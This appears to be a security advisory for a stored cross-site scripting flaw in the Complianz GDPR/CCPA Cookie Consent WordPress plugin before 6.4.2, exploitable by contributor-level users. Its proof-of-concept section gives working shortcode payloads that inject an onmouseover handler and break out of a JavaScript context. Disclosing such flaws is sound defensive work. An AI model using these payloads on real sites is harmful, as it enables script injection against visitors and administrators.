Complianz - GDPR/CCPA Cookie Consent < 6.4.2 - Contributor+ Stored XSS

The plugins do not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

PoC

[cmplz-consent-area service=‘"onmouseover=alert(/XSS-service/)//’]a[/cmplz-consent-area] [cmplz-consent-area category=‘"onmouseover=alert(/XSS-category/)//’]a[/cmplz-consent-area] And move the mouse over the generated link to trigger the XSS Payload to trigger the XSS w/o interaction (the category attribute is also affected, with another payload): [cmplz-consent-area service=“')){}};alert(/XSS-service-js/); function b(){ if (cmplz_has_service_consent('a”]a[/cmplz-consent-area]